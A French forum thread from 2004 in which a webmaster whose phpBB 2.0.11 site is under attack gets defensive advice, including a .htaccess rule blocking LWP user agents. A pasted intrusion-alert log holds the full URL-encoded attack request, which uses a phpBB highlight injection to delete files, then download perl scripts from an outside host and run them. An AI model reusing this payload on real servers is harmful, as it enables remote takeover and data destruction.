.htaccess : protéger des fichiers?

[Recif]

Bonjour,

quelqu'un sait si on peut protéger de la suppression et/ou de la modification les fichiers de tout un répèrtoire via .htaccess??

Steph

Modifié 28 Décembre 2004 par Recif

[Dan]

Salut Steph,

Le fichier .htaccess n'a pas cette vocation. Par contre, si tu as accès au shell Linux, tu peux changer les permissions sur les fichiers et répertoires concernés.

[Recif]

J'ai tous mes fichiers en CHMOD 444 et la nuit dernière tous ont été supprimés!... Comment les protéger autrement?...

[Dan]

Pour éviter que des fichiers soient supprimés, il faut enlever les permissions d'écriture du répertoire qui les contient

Mais ils ont été supprimés par qui/quoi ?

[Recif]

J'ai le répertoire en CHMOD 545

La raison est que je me fais hacker violament mon site depuis une semaine et ce matin vers 2h00 c'était la totale : tous les fichiers de la racine supprimés.

En général c'était d'autre fichiers modifiés pour soit empêcher l'accès au site, soit changer les valeurs d'un formulaire...

J'ai installé sentinel 2.1.2 et j'ai une attaque env. toutes les 4/5mn

Modifié 28 Décembre 2004 par Recif

[Dan]

Tu as des forums phpBB sur le serveur ?

Regardes si tu n'as pas des fichiers .txt dans les répertoires /tmp et /var/tmp

Enlèves-les et changes le mode de /usr/bin/wget en 750

Je pense que pratiquement tous les serveurs dédiés ont subi des attaques ces derniers jours, le Hub aussi.

J'ai refusé de servir plus de 200 000 pages depuis samedi. Ca fait pas mal d'attaques. On avait une tentative de hack par seconde, au plus fort du weekend.

[Recif]

En effet j'ai un phpbb.

J'ai jetté un oeil et pas trouvé de fichiers txt

Les attaques sont de type www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

quant au usr/bin/ Je n'ais pas d'accès (hébèrgement dédié)

[Dan]

Quelle version de phpBB ? pas la dernière probablement ?

Si tu as accès au firewall, il suffit de fermer l'accès au serveur filepack.superbr.org (si ton hébergeur le permet)

Dans la négative, envoies un mot au support en demandant qu'ils le fassent. Joints-y une partie de tes logs pour justifier ta demande.

[Dan]

Une chose... la ligne de l'attaque n'est pas complète.

Peux-tu donner une ligne avec le UserAgent ? Je te donnerais une règle pour le fichier .htaccess.

[Recif]

Ok, voici le mail complet que j'ai d'un des derniers :

X-Mailer: NukeSentinelT

Message-Id: <E1CjLWW-0005Jf-00_AT_http5>

Sender: <hyipfrance_AT_http1>

Date: Tue, 28 Dec 2004 18:52:44 +0100

Date & Heure: 2004-12-28 18:52:42

IP Blockée: 64.62.172.228

Membre ID: Anonymous (1)

Raison: Abuse-Script

--------------------

Membre Agent: LWP::Simple/5.803

Requête tentée: www.xxxx.com/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;cd%20rm%20-rf%20*;wget%20http://filepack.superbr.org/sess_0bc3910d07edb36750a9babbd179edb4;perl%20sess_0bc3910d07edb36750a9babbd179edb4;wget%20http://filepack.superbr.org/wow.e;perl%20wow.e%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

Référant de: none

IP Cliente: none

Adresse Décellée: 64.62.172.228

Port Décellé: 58861

MÉthode de la requête: GET

--------------------

Who-Is pour cette IP

OrgName: Hurricane Electric

OrgID: HURC

Address: 760 Mission Court

City: Fremont

StateProv: CA

PostalCode: 94539

Country: US

NetRange: 64.62.128.0 - 64.62.255.255

CIDR: 64.62.128.0/17

NetName: HURRICANE-4

NetHandle: NET-64-62-128-0-1

Parent: NET-64-0-0-0-0

NetType: Direct Allocation

NameServer: NS1.HE.NET

NameServer: NS2.HE.NET

NameServer: NS3.HE.NET

Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE

RegDate: 2002-08-27

Updated: 2003-09-15

TechHandle: ZH17-ARIN

TechName: Hurricane Electric

TechPhone: +1-510-580-4100

TechEmail: hostmaster_AT_he.net

OrgTechHandle: ZH17-ARIN

OrgTechName: Hurricane Electric

OrgTechPhone: +1-510-580-4100

OrgTechEmail: hostmaster_AT_he.net

[Recif]

Et la version phpbb :

Module's Name: Forums

Module's Version: 2.0.11

Module's Description: phpBB 2.0.11 port for PHP-Nuke

License: GNU/GPL

Author's Name: chatserv

Author's Email: chatserv_AT_nukeresources.com

tu crois que les attaques sont toutes parties de ce forum?

[Recif]

Le problème c'est que c'est un hébergement mutualisé, je n'ais aucun accès à la config

[Dan]

Salut Recif,

Pratiquement toutes ces attaques viennent par l'outil LWP et ont donc toutes le user-agent "LWP::Simple"

En général, la première requête de l'attaque vient avec le UserAgent "lwp-trivial".

Il suffit donc de bloquer ces deux User-Agents dans un fichier .htaccess, comme ceci:

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} LWP::Simple [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial [NC]
RewriteRule .* - [F]

Tu devrais être débarrassé de ces attaques.

Dan

[Recif]

Ok, merci, je vais essayer ça. Sinon en phpbb je ne trouve pas de patch de sécurité pour la v2.0.11...